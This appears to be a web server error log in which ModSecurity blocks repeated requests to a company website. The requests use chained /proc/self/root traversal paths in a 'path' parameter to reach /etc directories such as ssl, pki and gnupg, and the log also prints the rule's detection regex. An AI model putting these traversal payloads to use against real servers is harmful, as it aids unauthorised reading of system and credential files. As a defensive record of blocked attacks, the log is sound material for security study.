[Mon Mar 16 16:51:44.323682 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.243.203:38928] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfUM_BxrYCr4hPDw_-gAAAAcQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:51:47.877267 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:38936] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfU_9ocpUE4ed4uDwHCQAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:51:49.176519 2026] [:error] [pid 29507:tid 140411666392832] [client 74.7.243.203:38942] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfVUr9dMAiw-8KANNbWAAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:51:59.527408 2026] [:error] [pid 10651:tid 140411599251200] [client 74.7.243.203:51128] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfX7ysWC90G-1nBrBYJwAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:52:00.928203 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.243.203:41232] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfYKTCbgAP5jq5TehA7wAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:52:02.180436 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.243.203:41248] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfYrABkC4fWIHEf8EHzgAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:52:03.385923 2026] [:error] [pid 15061:tid 140411616036608] [client 74.7.243.203:41256] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfY6TCbgAP5jq5TehA8AAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:52:04.759288 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.243.203:41266] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfZKTCbgAP5jq5TehA8gAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:52:10.743764 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:41276] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfarysWC90G-1nBrBYMAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:52:26.984839 2026] [:error] [pid 15568:tid 140411708356352] [client 74.7.243.203:42688] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfeqQpVkWug9HeOt9J8AAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:52:30.446184 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:44474] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfftSswJuvopo3lOhzigAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:52:34.158491 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:33542] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfgs_BxrYCr4hPDw_-jAAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:52:39.526889 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:33550] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfh_9ocpUE4ed4uDwHGAAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:52:47.132676 2026] [:error] [pid 29507:tid 140411741927168] [client 74.7.241.46:49504] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfj0r9dMAiw-8KANNbhAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 16:53:06.910290 2026] [:error] [pid 29507:tid 140411741927168] [client 74.7.241.46:47530] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfokr9dMAiw-8KANNbpAAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:53:21.788539 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.241.46:54436] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfsY6lpbStxTqkSkt_LgAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:53:37.654720 2026] [:error] [pid 15568:tid 140411590858496] [client 74.7.241.46:38190] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfwaQpVkWug9HeOt9KCQAAA1I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:53:40.255883 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:41836] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhfxLysWC90G-1nBrBYPwAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:53:55.116976 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.243.203:53664] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf07ABkC4fWIHEf8EILAAAAE4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:53:56.458663 2026] [:error] [pid 21805:tid 140411683178240] [client 74.7.243.203:42226] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf1LABkC4fWIHEf8EILQAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 16:54:01.074423 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.243.203:42234] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhf2aTCbgAP5jq5TehBCwAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:54:11.674154 2026] [:error] [pid 15568:tid 140411733534464] [client 74.7.243.203:41036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 